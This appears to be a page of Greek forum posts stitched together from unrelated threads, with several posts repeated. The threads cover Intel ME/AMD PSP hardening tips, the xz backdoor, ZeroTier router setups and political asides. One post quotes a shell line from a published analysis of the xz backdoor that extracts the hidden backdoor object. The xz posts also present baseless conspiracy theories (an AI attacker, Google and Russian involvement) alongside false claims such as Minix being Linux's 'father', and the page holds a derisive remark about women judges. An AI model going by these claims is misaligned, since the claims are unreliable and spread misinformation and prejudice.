Αναζήτηση:

Ωραιος.. μολις εστησα homelab σερβερ με intel 12900h και ενας απο τους λογους ηταν το vpro :)

αυτη η τεχνολογια χρησιμευει και η δαιμονοποιηση της ξεκινησε επειδη δεν διαφημιστηκε στους sysadmin / pro users ωστε να την κλειδωσουν εξαρχης με ενα password και μια ωρα πρωια το 2018 νομιζω εσκασε ενα exploit που η ιδια η ιντελ ανακοινωσε οτι επρεπε να το κανουν update ολοι και τοτε αρχισαν ολοι να αναρωτιουνται τι παιζεται .

να σκεφτεις το ιδιο ακριιβως κανει και το ilo της HP που πρεπει να το πληρωσεις για να το βαλεις στους server σου!

που μπορει να ειναι και κανενα frontend αυτου στην τελικη :p

συγκεκριμενα βασιστηκε στον ΠΑΤΕΡΑ του Linux = minix => minix 3

ΠΑΙΔΕΣ ΧΑΛΑΡΩΣΤΕ ...

δεν χρειαζεται να "σπασετε" το bios rom για να σταματησει να "μιλαει" στους ΕΞΩ

η λυση ειναι απλη.θα πρεπει να μπλοκαρεται αυτες τις υπομοναδες στο να επικοινωνουν με τους ΕΞΩ!

να πω κιαλλα? νομιζω δεν χρειαζεται για τους δικτυαδες / sysadmin σε windows & linux και για οσους δεν καταλαβαν θα την πω για να δειτε ποσο απλη ειναι.

1) δεν φορτωνετε τους drivers των υπομοναδων me/psp sta windows , blacklist στα linux (mei & mei_me νομιζω) και αν εχει επιλογη να το κλεισετε απο το bios για να αποφυγετε τις εφαρμογες π.χ. ο browser η τα παιχνιδια να επικοινωνουν μεσω javascript με αυτες ακομα καλυτερα
2) τις μπλοκαρετε στον router σας τις default ports τους . π.χ απο openwrt για amt / me (https://forum.openwrt.org/t/disable-intel-amt-me-ports/15774) επειδη ειναι αρκετες. δυστυχως για τον psp δεν βρηκα και δεν εχω
νεο amd κιολας για να το ψαξω (FX 4thewin :oneup:)
3) ΚΑΤΑΡΓΕΙΤΕ ΤΙΣ ONBOARD NICS (αυτο ειδικα μαζι με το 4 ειναι ...)
4) ΧΡΗΣΙΜΟΠΟΙΕΤΕ ΕΞΩΤΕΡΙΚΕΣ NICS οσο ποιο διαδομενες και ανοιχτου κωδικα γινεται για να παρακολουθουν τους drivers τι φορτωνουν πολλα ματια
και αν επιμενετε να το σκαλισετε ... πριν κανετε καμια χαζομαρα και μεινετε χωρις μητρικη
5) πιανετε κολλητο τον ΕΛΛΗΝΑ plutomaniac του ιστορικου πλεον winraid και γινεστε θαμωνες στο level1techs.com πριν κανετε οτιδηποτε! αυτοι ξερουν τι γινεται καλυτερα απο τον καθενα! https://winraid.level1techs.com/

αυτο καλο, αλλα μοιαζει με σαν εκεινο με τον ναρκομανη που τραυματιζεται για να νιωσει καλυτερα. :whistle:

δεν εχω αυτοκτονικες η αυτοτραυματικες τασεις ... το δηλωνω δημοσια :rtfm:

μεταξυ αστειου και σοβαρου εκανα και το αρχικο μου post quote για να στο εξηγησω τεχνικα ...

ΤΙ ΕΙΝΑΙ ΑΥΤΕΣ ΟΙ ΥΛΟΠΟΙΗΣΕΙΣ? minix ?

ΤΙ ΕΙΝΑΙ ΤΟ ΜΙΝΙΧ ? ο πατερας του linux που εχει ολα τα κουσουρια του αρχικου λινουξ και το πιο σημαντικο απο ολα ... ΠΕΡΙΟΡΙΣΜΕΝΗ ΒΑΣΗ DRIVERS!!! συγκεκριμενα., 1η παραγραφος... -> usb καπουτ αρα βγαλτε εκτος τα ... usb nics για αρχη παντα!

(το ειχα πει τι ειναι πραγματικα στο πρωτο quote μου αλλα δεν του δωσατε σημασια φαινεται... δεν πειραζει γιατι ηξερα οτι θα ερθει αυτη η στιγμη :whistle:)


ΠΟΤΕ ΞΕΚΙΝΗΣΕ ΑΥΤΗ Η... "Vpro" ΤΕΧΝΟΛΟΓΙΑ ? απο τις μητρικες που κατασκευαστηκαν μετα το 2008. 1η παραγραφος παλι στο wikipedia! https://en.wikipedia.org/wiki/Intel_Management_Engine


ΑΡΑ... με αυτα τα δεδομενα αν καποιος εχει π.χ. μητρικη που φτιαχτηκε το 2012 η 2018 και αγορασει ενα εσωτερικο nic που φτιαχτηκε το 2020 με ποιους drivers θα επικοινωνησει αυτο το minix? μεσω της εσωτερικης nic που το εχει ρυθμισει ο κατασκευαστης ΑΠΕΥΘΕΙΑΣ δεν θα μπορει γιατι θα την εχετε κανει disable στο bios και ετσι θα πρεπει να χρησιμοποιησει τον ΔΙΑΥΛΟ με το λειτουργικο ... αλλα και παλι αν το εχετε μπλοκαρει απο το ρουτερ την προς τα μεσα, ακομα και να επικοινωνει προς τα εξω, δεν θα μπορει καποιος να συνδεθει πανω του!

αρα ... καπουτ η συνδεση των εξω προς τα εσας!

και τωρα παραμενει στο προβλημα μας, τι κανουμε αν στελνει το PC πακετα συνδεσεις προς τα εξω. ΕΕΕ ΓΙΑΥΤΟ ΕΛΕΓΑ ΕΞΑΡΧΗΣ ΟΤΙ ΛΕΙΠΕΙ ΤΟ SOFTWARE FIREWALL ΣΤΑ LINUX!

υ.γ. αν κανει καποιος disable π.χ. την καμερα στο bios η τα usb και παει να βαλει usb mouse η να χρησιμοποιησει την καμερα για βιντεοκλησεις ακομα και drivers να ειχε το λειτουργικο δεν δουλευει με τιποτα . πρεπει να ανοιχτει στο bios + RESTART για να δουλεψει!

υ.γ. 2 επαναλαμβανω για να μην βρεθειτε χωρις μητρικη... ΜΗΝ ΑΚΟΛΟΥΘΗΣΕΤΕ ΚΑΝΕΝΑΝ ΟΔΗΓΟ ΑΠΟ ΓΙΟΥΤΙΟΥΜΠ κλπ το flashing του bios ειναι μια unstable διαδικασια και αν εχετε το μερακι για να τα σκαλισετε να πατε στο winraid Πρωτα που εχει αυτες τις κατηγοριες και ο ADMIN ΕΙΝΑΙ ΕΛΛΗΝΑΣ που ειχε παλια το winraid φορουμ πριν κλεισει λογω οικονομικων απαιτησεων και του εχει δωσει subdomain ο level1 techs!

https://winraid.level1techs.com/

ειναι ΣΠΕΣΙΑΛ ΤΟΠΙΚ αυτο το θεμα και ο λογος ειναι οτι δεν ειναι για το ευρυ κοινο η ολη διαδικασια

Special Topics
Tips/Questions/Links
Intel Management Engine
AMD Platform Security Processor
CPU Microcodes
Other Tools (not BIOS modding related)
NVMe Support for old Systems
Interesting PC Hardware & Software

ευτυχως υπαρχει ακομα το awmn ...

μετα το 41% ΕΠΙ ΤΩΝ ΨΗΦΙΣΘΕΝΤΩΝ επρεπε να λεει ο τιτλος


αυτος επρεπε να ειναι αλλα αυτο πλεον δεν εχει και πολυ σημασια τελικα μιας και οι αντικαταστατες μας ηρθαν και τους εκαναν ΕΛΛΗΝΕΣ και πιο ΕΛΛΗΝΕΣ απο τους ελληνες!!!

αφηνω το κομματι της συμπαθεστατης (τυπικα το ειπα, δεν την ξερω την κυρια) με τα ποσοστα των γυναικων στην Δικαιοσυνη ως λειτουργοι της πριν 5 χρονια και ας βγαλετε οτι συμπερασμα θελετε...

"
-Το 72% στα διοικητικα δικαστηρια ειναι γυναικες και το 80,3% στα Ειρηνοδικεια
-Απιστευτες οι εξομολογησεις τους
-Μενουν αγαμες παρα πολλες
"

ετσι ξεκινησε το αρθρο της . :rofl:

πηγη: https://www.paron.gr/2019/03/07/katalipsi-ton-dikastirion-apo-gynaikes-dikastes/

Δεν μπορει να καποιος να απενεργοποιησει αυτο το feature στην Intel με καποιο τροπο; πχ το AMD Platform Security Processor (PSP) εχει driver, απενεργοποιειται μεσα απο το Device Manager---->Security devices---->{AMD PSP}.

Μπορει απο το bios/uefi. Αλλα και παλι δεν μου αρεσει γιατι μπορει στο ενεργοποιησει ενας ιος

Οχι φιλε μου δεν μπορεις ειναι ματαιο. Γιατι ο αλλος θα σε χακαρει και μετα θα το κανει disabled για να καλυψει τα ιχνη.

πηγη:https://www.eff.org/el/node/95854

παιδια βρηκα το minix.
https://wiki.minix3.org/doku.php?id=usersguide:hardwarerequirements
https://distrowatch.com/table.php?distribution=minix

- - - Updated - - -

το μονο που μπορεις να κανεις ειναι jailbreak cpu αλλα προσεχε γιατι μπορεις να μπρικαρεις την cpu και να την χαλασεις.
https://www.youtube.com/watch?v=aRUxfxp9dJ8

- - - Updated - - -

Ρε που καταντησαμε να κανεις jailbreak την cpu :mad:

ΠΑΙΔΕΣ ΧΑΛΑΡΩΣΤΕ ...

δεν χρειαζεται να "σπασετε" το bios rom για να σταματησει να "μιλαει" στους ΕΞΩ

η λυση ειναι απλη.θα πρεπει να μπλοκαρεται αυτες τις υπομοναδες στο να επικοινωνουν με τους ΕΞΩ!

να πω κιαλλα? νομιζω δεν χρειαζεται για τους δικτυαδες / sysadmin σε windows & linux και για οσους δεν καταλαβαν θα την πω για να δειτε ποσο απλη ειναι.

1) δεν φορτωνετε τους drivers των υπομοναδων me/psp sta windows , blacklist στα linux (mei & mei_me νομιζω) και αν εχει επιλογη να το κλεισετε απο το bios για να αποφυγετε τις εφαρμογες π.χ. ο browser η τα παιχνιδια να επικοινωνουν μεσω javascript με αυτες ακομα καλυτερα
2) τις μπλοκαρετε στον router σας τις default ports τους . π.χ απο openwrt για amt / me (https://forum.openwrt.org/t/disable-intel-amt-me-ports/15774) επειδη ειναι αρκετες. δυστυχως για τον psp δεν βρηκα και δεν εχω
νεο amd κιολας για να το ψαξω (FX 4thewin :oneup:)
3) ΚΑΤΑΡΓΕΙΤΕ ΤΙΣ ONBOARD NICS (αυτο ειδικα μαζι με το 4 ειναι ...)
4) ΧΡΗΣΙΜΟΠΟΙΕΤΕ ΕΞΩΤΕΡΙΚΕΣ NICS οσο ποιο διαδομενες και ανοιχτου κωδικα γινεται για να παρακολουθουν τους drivers τι φορτωνουν πολλα ματια
και αν επιμενετε να το σκαλισετε ... πριν κανετε καμια χαζομαρα και μεινετε χωρις μητρικη
5) πιανετε κολλητο τον ΕΛΛΗΝΑ plutomaniac του ιστορικου πλεον winraid και γινεστε θαμωνες στο level1techs.com πριν κανετε οτιδηποτε! αυτοι ξερουν τι γινεται καλυτερα απο τον καθενα! https://winraid.level1techs.com/

το καλο ειναι οτι το Qwant ειναι ευρωπαικο search engine (νομιζω γαλλοι), το κακο ειναι οτι η FIREFOX και τα παραγωγα της εχουν πιασει πατο κανονικο

ΔΕΝ ΓΙΝΕΤΑΙ ΝΑ ΚΑΝΕΙ Ο BROWSER CALLS ΣΤΗΝ LOOPBACK ΖΩΝΗ, ΟΠΩΣ ΚΑΝΕΙ Ο FIREFOX & TA ΥΒΡΙΔΙΑ ΤΗΣ....

προσπαθησα να φυγω απο την google και την παρεα της μιας και η Λ0Γ0ΚΡ1Σ1Α ΠΑΕΙ ΤΡΕΝΟ και το καλυτερο που μπορεσα να βαλω ειναι το ungoogled της γιατι firefox κλπ υβριδια της οπως ο palemoon προσπαθουν να βγουν μεσω loopback και φυσικα το software firewall παθαινει εγκεφαλικα... συνεχομενα κιολας!!!


ΑΣ ΜΕΙΝΕΙ ΣΤΟ 2.8% ΤΗΣ ΑΓΟΡΑΣ ΚΑΙ ΠΟΛΥ ΤΗΣ ΕΙΝΑΙ ΤΗΣ "ΑΛΕΠΟΥΣ" , ΗΡΘΕ Ο ΚΑΙΡΟΣ ΓΙΑ ΝΕΟΥΣ BROWSER!

Μια μικρη διανομη λινουξ ειναι το Intel Me

συγκεκριμενα βασιστηκε στον ΠΑΤΕΡΑ του Linux = minix => minix 3

Ναι, σε αυτο.
....
Υποστηριζεται εκ του wrt, θελει arm κατ'ελαχιστον,
arm64 πιο ρεαλιστικα.

Με τα παραπανω δυο δεδομενα,
ο καθε ενδιαφερομενος που θελει wrt-based λυση
θα κανει την ερευνα του και θα επιλεξει καποιο target που θαναι arm64 με τα λοιπα specs της αρεσκειας του
και αναλογως των αναγκων του και ποσα λεφτακια θελει/μπορει να ξοδεψει.

Αν σε καποια targets παιζει καλυτερα/χεροτερα,
με λιγοτερα/περισσοτερα προβληματα,
αυτα ειναι πραγματα που θα τα ρωτησει στο forum του wrt.

προσπερναω οσα αναφερθηκαν για τα μαγαζια και επικεντρωνομαι στα τεχνικα ζητηματα ...

δηλαδη ακομα και ενα raspberry που ειναι arm64 θα μπορουσε να χρησιμοποιηθει ως zerotier node με αξιοπρεπεια?

δεν πανικοβαλεται χωρις λογο ...


H XZ ΔΗΜΙΟΥΡΓΕΙ BACKDOOR DRIVER ΜΕ ΧΡΗΣΗ ΚΩΔΙΚΑ RC4 ΚΡΥΠΤΟΓΡΑΦΙΑΣ, ΓΙΑΤΙ ΑΡΑΓΕ?

εδω ολο το decrypt της 5.6.1 εκδοσης που καταληγουν τα sed, eval & τα regex σε ...

https://gynvael.coldwind.pl/?id=782

"
6. And then bytes from N (0) to W (~86KB) are being carved out using the same usual head tricks, and saved as liblzma_la-crc64-fast.o – which is the final binary backdoor.

((head -c +$N > /dev/null 2>&1) && head -c +$W) > liblzma_la-crc64-fast.o
"

ΑΠΟΨΗ ΜΟΥ ΠΑΝΤΑ ...

για το προβλημα οτι ειχε μεινει με 2 dev αυτη η πολυ σημαντικη βιβλιοθηκη φταινε 100% οι ΚΑΘΗΓΗΤΕΣ ΠΛΗΡΟΦΟΡΙΚΗΣ!

Τι ηταν ο TANENBAUM ? καθηγητης
Τι ηταν ο Linus οταν ξεκινησε το Linux? Φοιτητης
Τι ειναι το Debian? Του Πανεπιστημιου του Ορεγκον
Απο που βγαινουν οι Στρατιες των Linux-αδων ? Απο τα Πανεπιστημια

ΚΑΙ ΠΟΙΟΣ ΘΥΣΑΥΡΙΖΕΙ ΑΠΟ ΤΙΣ ΠΤΥΧΙΑΚΕΣ ΤΩΝ ΦΟΙΤΗΤΩΝ ΠΟΥ ΓΙΝΟΝΤΑΙ ΒΙΒΛΙΑ η ΠΩΛΙΟΥΝΤΑΙ ΣΤΙΣ ΕΤΑΙΡΕΙΕΣ ΩΣ PROJECTS η ΠΙΑΝΟΥΝ ΘΕΣΕΙΣ CEO/ΣΥΜΒΟΥΛΩΝ ΣΕ ΕΤΑΙΡΕΙΕΣ ΔΙΣΕΚΑΤΟΜΜΥΡΙΩΝ?


ΤΟ ΠΡΟΒΛΗΜΑ TOY LINUX ΠΟΥ ΛΕΓΕΤΑΙ ΚΑΘΗΓΗΤΕΣ ΠΛΗΡΟΦΟΡΙΚΗΣ ΘΑ ΕΠΡΕΠΕ ΗΔΗ ΝΑ ΕΙΧΑΝ ΜΟΙΡΑΣΕΙ ΤΑ ΠΡΟJECTS ΣΕ ... ΠΕΔΙΑ ΕΥΘΥΝΗΣ


αν θελουν να συνεχισουν να μιλανε για open source community θα πρεπει να αλλαξουν νοοτροπια!

οτι αλλο ειπωθει για το linux θα ειναι παραπετασμα καπνου απο τους ιδιους που κανουν δουλιτσες με τις εταιρειες εκμεταλευομενοι την δουλεια των φοιτητων για να βγαζουν λεφτα. Ακριβως τα ιδια και χειροτερα κανει η google με το android που ουτε καν ενα σοβαρο antivirus συστημα δεν εχει δημιουργησει για το play store (για να μην αρχισω παλι τα frankestein αγαπη μου ).

οταν βγαζουν εκατομμυρια ειναι καλα, οταν ειναι να κανουν σωστα την δουλεια τους ολοι αυτοι οι εκμεταλευτες θυμουνται το ... COMMUNITY δηλαδη ... τα ΚΟΡΟΙΔΑ!!!

ΣΙΓΑ ΜΗΝ ΦΤΑΙΕΙ Ο ΚΥΡΙΟΣ DEV ΕΠΕΙΔΗ ΔΕΝ ΜΠΟΡΕΙ ΝΑ ΑΣΧΟΛΗΘΕΙ ΜΕ ΤΟ PROJECT TOY

ξερει κανεις αν δεν του ειχαν βαλει και κανενα :gun: στον κροταφο?

δυστυχως δεν ειναι τοσο απλο το attack και με ενα απλο grep ΔΕΝ μπορει καποιος να το αποκαλυψει. Οχι οτι ειναι λαθος η grep εντολη που ειχα βαλει αλλα αυτη θα πρεπει να τρεξει αφου γινουν Deobfuscate ολα τα sed, tr, cut, eval κλπ στα ... 700 commits που εχει κανει!!!




και ηδη εχουν αρχισει καποιοι και αναρωτιουνται μηπως δεν ειναι ανθρωπινο χερι πισω απο αυτην την επιθεση.

ειναι παρα πολυ προχο αυτο που εγινε γιατι κανει backdoor και αλλες υπηρεσιες ταυτοχρονα οπως το ssh στην προκειμενη περιπτωση



αυτο το σχεδιαγραμμα δειχνει ποσο περιπλοκη ειναι η επιθεση και εγω ειμαι πλεον της αποψης οτι δεν ειναι ανθρωπινο χερι λογω πολυπλοκοτητας

ΑΙ εγραψε ο prophet ... https://gynvael.coldwind.pl/?id=782

"
2024-03-31 19:14:58 = prophet
{
i think Jia Tan is an AI
}
"

δεν ξερω αν ειναι ΑΙ αλλα ενα ειναι το σιγουρο... ΘΑ ΜΠΟΡΟΥΣΕ ακριβως για τον λογο του οτι μια τετοια επιθεση στον κωδικα μονο με... νοημοσυνη ανιχνευεται!

υ.γ. επισης αυτος που το ανακαλυψε ειναι της MS ....

αυτο ειναι το ακριβες λινκ που ειναι ΑΚΟΜΑ UP οπως και του GITHUB του λογαριαμου... what?

jiaT75 on MS
https://learn.microsoft.com/en-us/cpp/overview/whats-new-cpp-docs?view=msvc-170#community-contributors

to link παει στο github του που ειναι UP
https://github.com/JiaT75

οργανισμος ... ο TOYKAΑNI. εεεε github ολα καλα? :worthy:
https://github.com/tukaani-project


repositories 10 ...
https://github.com/JiaT75?tab=repositories

και εχουμε και κλαιμε!
https://github.com/JiaT75/oss-fuzz <-- ΚΑΙ ΤΩΡΑ ΑΡΧΙΖΟΥΝ ΤΑ ΔΥΣΚΟΛΑ ΓΙΑ ΤΗΝ ΓKOYLAGK... google / oss-fuzz . AYTO EINAI TO ΜΟΝΑΔΙΚΟ REPO ΠΟΥ ΕΙΝΑΙ ΓΙΑ... HACKERS... TYXAIO? ΔΕΝ ΝΟΜΙΖΩ
https://github.com/JiaT75/cpp-docs
https://github.com/JiaT75/wasmtime <-- A standalone runtime for WebAssembly. δηλαδη ολοι οι συγχρονοι browsers !!! back to palemoon on windows 7 asap :p
https://github.com/JiaT75/squashfs-tools <-- Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes and directories. Squashfs is used by the Live CD versions of Arch Linux, Clonezilla, Debian, Fedora, Gentoo Linux, KDE neon, Kali Linux, Linux Mint, NixOS, Salix, Ubuntu, openSUSE and on embedded distributions such as the OpenWrt and DD-WRT router firmware.

ΑΝ ΕΧΕΙ ΠΕΙΡΑΞΕΙ ΑΥΤΟ ΕΔΩ ΘΑ ΜΙΛΑΜΕ ΓΙΑ ΑΣΥΛΛΗΠΤΑ ΤΕΡΑΣΤΙΑ ΖΗΜΙΑ

https://github.com/JiaT75/STest
https://github.com/JiaT75/libarchive <-- The libarchive project develops a portable, efficient C library that can read and write streaming archives in a variety of formats. It also includes implementations of the common tar, cpio, and zcat command-line tools that use the libarchive library.
https://github.com/JiaT75/seatest
https://github.com/JiaT75/zstd
https://github.com/JiaT75/lz4 < --- λολ Beyond the C reference source, many contributors have created versions of lz4 in multiple languages (Java, C#, Python, Perl, Ruby, etc.). A list of known source ports is maintained on the LZ4 Homepage. TO firefox το χρησιμοποιει απο οτι ξερω. εδω ειμαστε να δειτε για ποτε θα σκασει και αυτο!!!
https://github.com/JiaT75/ZipArchive <---- ZipArchive is a simple utility class for zipping and unzipping files on iOS, macOS and tvOS. WHAT?

ΕΠΙΣΗΣ ... ΑΦΗΝΩ τις 2 πρωτες δραστηριοτητες του... 1α σε private και μετα στα lz4 που τα χρησιμοποιει κατακορον ο FIREFOX, ο μοναδικος πλεον αντιπαλος του Chromium ακα Chrome + edge +κλπ = 70% της αγορας! ΠΗΓΗ. https://gs.statcounter.com/browser-market-share

ΑΡΧΙΚΑ
255143
KAI META
255144


Υ.Γ. τιποτα δεν ειναι τυχαιο στην ζωη ... και τωρα καταλαβα γιατι δεν το εκλεισε το github το να τα δουμε... οι ενδειξεις σιγουρα δεν ειναι αποδειξεις αλλα αν δεν μαθουμε ποια private repo χρησιμοποιουσε δεν προκειται να βγαλουμε ασφαλη συμπερασματα. ομως δυστυχως για την γκουγκλ το repo της ειναι το μονο που δεν εχει καμια σχεση με ολα τα υπολοιπα που ειναι για συμπιεση ΚΑΙ οτι τα firefox + SAFARI που στοχοποιηθηκαν απο την δραστηριοτητα αυτου του jiT75 ειναι οι μοναδικοι αντιπαλοι του ... chromium !

μεχρι να βρουν οι devs του firefox τι εκανε ο λεγαμενος στην lz4, firefox δεν ξαναχρησιμοποιοω στα linux και σταματαω και τo chromium και μαλλον θα ξαναγυρισω στα windows 7 και στο palemoon που δεν χρησιμοποιει WebAssembly

ειχαμε καταλαβει οτι κατι δεν παει καλα με το chromium projectσ οταν στην σελιδα του με τα fork του υπαρχουν μονο το chrome και το chromiumOS (ουτε καν ο edge που της εδωσε +5%) https://www.chromium.org/chromium-projects/

255147


υ.γ. φαινεται εχει μαζεψει πολλους πονηρους στα γραφεια της...

https://www.youtube.com/watch?v=palHOI8S4-8


ειδα οτι καποιος ειπε οτι ειναι παρα πολλοι οι fork του chromium ... αυτοι οι πολλοι? https://en.wikipedia.org/wiki/Chromium_(web_browser)

εγω την εφτιαξα σωστα παντως την σελιδα του chromium που εβαλα στο απο πανω αρθρο και με ενα απλο copy-paste ;)

ετσι επρεπε να ηταν η σελιδα με τα projects του chromium ...

255175

εσεις φυσικα μπορειτε να εχετε αλλη αποψη, δικαιωμα σας οπως εχω και εγω αλλη αποψη!


Και καποιος αλλος ειπε οτι πολιτικοποιησα το θεμα επειδη εβαλα το παραπανω βιντεο ... περα απο το οτι δεν υπαρχει κατι αλλο εκτος πολιτικης στην ζωη μας....

Ο ανθρωπος ειναι «φυσει πολιτικον ζωον», το ειπε ο ΑΡΙΣΤΟΤΕΛΗΣ που διδαξε τον Μεγα Αλεξανδρο και καταφερε μεσα σε εναμιση χρονο να φτασει ΙΝΔΙΕΣ!

δεν το εβαλα γιαυτο και κακως ερμνευτηκε ετσι προσπαθωντας να με χρωματισει η να κομπλαρω . χαχαχαχα εδω γελαμε αλλα θα συνεχισω στο γιατι εβαλα αυτο το βιντεο και εχει να κανει με αυτο που ειχα γραψει στα 2 πρωτα αρχικα αρθρα πιο πανω που λεω οτι πισω απο αυτην την επιθεση κρυβεται.... ΝΟΗΜΟΣΥΝΗ = INTELIGENCE !

και τωρα αρχιζουν τα δυσκολα...

ΑΡΧΙΚΑ η μονη διανομη που ουσιαστικα εκανε κατι μεχρι στιγμης ειναι η debian και εδω κρυβεται ενα παραδοξο. https://www.debian.org/security/ ... υλοποιησε ενα patch για την py7zr που ηταν πατσ του ... 2022!

https://github.com/miurahr/py7zr/commit/1bb43f17515c7f69673a1c88ab9cc72a7bbef406

η gentoo φαινεται εχει μεινει στην xz που σημαινει οτι το ψαχνουν ακομα η οτι δουλευουν μονο αυτο τωρα... https://security.gentoo.org/glsa/

οι ΥΠΟΛΟΙΠΟΙ ειναι εταιρειες και ειπαν τα κλασσικα εταιρικα "ολα καλα" :whistle:

ξεκινησα με την debian και θα μεινω στην debian γιατι αφενος ηταν η μονη που εκανε κατι επιπλεον αλλα και επειδη δειχνει προς τα που κανει ... και αυτο ειναι το ... 7Ζ

η σελιδα με τον κωδικα του 7Ζ ειναι αυτη https://sourceforge.net/projects/sevenzip/files/7-Zip/ και που καποιος μπορει να κατεβασει και τον κωδικα μαζι με τα εκτελεσιμα...

Γιατι το εγραψα αυτο? Αν δειτε το κωδικα εχει μεχρι και asm αρχειο για την XZ και ο dev του 7z ειναι ... ΡΩΣΟΣ

Δεν θα πω τι εκανα σε προσωπικο επιπεδο αλλα αποψη μου παντα οτι η debian ξεκινησε audit στα 7z εκτελεσιμα και τα παραγωγα της ακριβως για τους λογους που εγραψα πριν!

υ.γ. ελπιζω να καταλαβατε τωρα γιατι εβαλα αυτο το βιντεο και οχι καποιο αλλο. αν οχι δεν μπορω να κανω τιποτα περισσοτερο :p

Τα private repositories μην τα κοιτας, τα public εχει σημασια. Προσπαθω να βρω στο github τα PR του χρηστη αυτου, αλλα δεν φαινεται να βρισκει κατι, εκτος αν κανω κατι λαθος εγω.

Ο,τι εγινε εγινε, καθε repository που εκανε commit ο συγκεκριμενος το ψαχνουν οι υπολοιποι devs.

Το θεμα ειναι απο τωρα και επειτα τι γινεται...

μεχρι να βρουν οι devs του firefox τι εκανε ο λεγαμενος στην lz4, firefox δεν ξαναχρησιμοποιοω στα linux και σταματαω και τo chromium και μαλλον θα ξαναγυρισω στα windows 7 και στο palemoon που δεν χρησιμοποιει WebAssembly

ειχαμε καταλαβει οτι κατι δεν παει καλα με το chromium projectσ οταν στην σελιδα του με τα fork του υπαρχουν μονο το chrome και το chromiumOS (ουτε καν ο edge που της εδωσε +5%) https://www.chromium.org/chromium-projects/

255147


υ.γ. φαινεται εχει μαζεψει πολλους πονηρους στα γραφεια της...

https://www.youtube.com/watch?v=palHOI8S4-8

https://learn.microsoft.com/en-us/cpp/overview/whats-new-cpp-docs?view=msvc-170

255138

Φανταστειτε τι αλλο εχουν ακουμπησει.

αυτο ειναι το ακριβες λινκ που ειναι ΑΚΟΜΑ UP οπως και του GITHUB του λογαριαμου... what?

jiaT75 on MS
https://learn.microsoft.com/en-us/cpp/overview/whats-new-cpp-docs?view=msvc-170#community-contributors

to link παει στο github του που ειναι UP
https://github.com/JiaT75

οργανισμος ... ο TOYKAΑNI. εεεε github ολα καλα? :worthy:
https://github.com/tukaani-project


repositories 10 ...
https://github.com/JiaT75?tab=repositories

και εχουμε και κλαιμε!
https://github.com/JiaT75/oss-fuzz <-- ΚΑΙ ΤΩΡΑ ΑΡΧΙΖΟΥΝ ΤΑ ΔΥΣΚΟΛΑ ΓΙΑ ΤΗΝ ΓKOYLAGK... google / oss-fuzz . AYTO EINAI TO ΜΟΝΑΔΙΚΟ REPO ΠΟΥ ΕΙΝΑΙ ΓΙΑ... HACKERS... TYXAIO? ΔΕΝ ΝΟΜΙΖΩ
https://github.com/JiaT75/cpp-docs
https://github.com/JiaT75/wasmtime <-- A standalone runtime for WebAssembly. δηλαδη ολοι οι συγχρονοι browsers !!! back to palemoon on windows 7 asap :p
https://github.com/JiaT75/squashfs-tools <-- Squashfs is a compressed read-only file system for Linux. Squashfs compresses files, inodes and directories. Squashfs is used by the Live CD versions of Arch Linux, Clonezilla, Debian, Fedora, Gentoo Linux, KDE neon, Kali Linux, Linux Mint, NixOS, Salix, Ubuntu, openSUSE and on embedded distributions such as the OpenWrt and DD-WRT router firmware.

ΑΝ ΕΧΕΙ ΠΕΙΡΑΞΕΙ ΑΥΤΟ ΕΔΩ ΘΑ ΜΙΛΑΜΕ ΓΙΑ ΑΣΥΛΛΗΠΤΑ ΤΕΡΑΣΤΙΑ ΖΗΜΙΑ

https://github.com/JiaT75/STest
https://github.com/JiaT75/libarchive <-- The libarchive project develops a portable, efficient C library that can read and write streaming archives in a variety of formats. It also includes implementations of the common tar, cpio, and zcat command-line tools that use the libarchive library.
https://github.com/JiaT75/seatest
https://github.com/JiaT75/zstd
https://github.com/JiaT75/lz4 < --- λολ Beyond the C reference source, many contributors have created versions of lz4 in multiple languages (Java, C#, Python, Perl, Ruby, etc.). A list of known source ports is maintained on the LZ4 Homepage. TO firefox το χρησιμοποιει απο οτι ξερω. εδω ειμαστε να δειτε για ποτε θα σκασει και αυτο!!!
https://github.com/JiaT75/ZipArchive <---- ZipArchive is a simple utility class for zipping and unzipping files on iOS, macOS and tvOS. WHAT?

ΕΠΙΣΗΣ ... ΑΦΗΝΩ τις 2 πρωτες δραστηριοτητες του... 1α σε private και μετα στα lz4 που τα χρησιμοποιει κατακορον ο FIREFOX, ο μοναδικος πλεον αντιπαλος του Chromium ακα Chrome + edge +κλπ = 70% της αγορας! ΠΗΓΗ. https://gs.statcounter.com/browser-market-share

ΑΡΧΙΚΑ
255143
KAI META
255144


Υ.Γ. τιποτα δεν ειναι τυχαιο στην ζωη ... και τωρα καταλαβα γιατι δεν το εκλεισε το github το να τα δουμε... οι ενδειξεις σιγουρα δεν ειναι αποδειξεις αλλα αν δεν μαθουμε ποια private repo χρησιμοποιουσε δεν προκειται να βγαλουμε ασφαλη συμπερασματα. ομως δυστυχως για την γκουγκλ το repo της ειναι το μονο που δεν εχει καμια σχεση με ολα τα υπολοιπα που ειναι για συμπιεση ΚΑΙ οτι τα firefox + SAFARI που στοχοποιηθηκαν απο την δραστηριοτητα αυτου του jiT75 ειναι οι μοναδικοι αντιπαλοι του ... chromium !

Το τρεχω πανω σε ενα ax3,
καλα παιζει, το setup ειναι ok και για χαζους,
η mtik ατυχως δεν ακολουθει απο κοντα τα upstream releases
οποτε ο daemon ειναι μερικες ver πισω.

Αν καποιος θελει ετοιμη λυση και εγκατασταση με 3 κλικ,
και παραμετροποιηση μεσα απο gui ειναι 3Α λυση.

Εναλλακτικα -> wrt.

Δεν ειναι vpn (αν και σε πολλα σεναρια μπορει να υποκαταστησει το vpn),
ειναι virtual network engine/layer, στα sd-wan εμπιπτει.

Στα + οτι θα παιξει ok με 1 nat layer, και παιζει και bridged, και μπορει να σπρωξει routes/dns στους clients.
Στα - οτι θα ειναι πολυ πιο αργο (throughput) vs wg/ipsec καθοτι τρεχει @userland.

Για λυση που κοστιζει 0€ μια χαρα.


ευχαριστω αρχικα για την απαντηση αλλα να ζητησω μια διευκρινηση. αναφερεσαι σε αυτο το μοντελο microtik https://www.skroutz.gr/s/40321904/MikroTik-hAP-ax3-WiFi-Mesh-Network-Access-Point-Wi-Fi-6-Dual-Band-2-4-5GHz.html#reviews η σε καποιο αλλο?

wrt ναι αλλα ποιο η ποια? οπως ειδες στο αρχικο ποστ δυστυχως ουτε οι ιδιοι απο την zerotier δεν λενε συγκεκριμενα μοντελα που δουλευει χωρις προβληματα οπως αναφερες ηδη αυτο με τις ενημερωσεις!

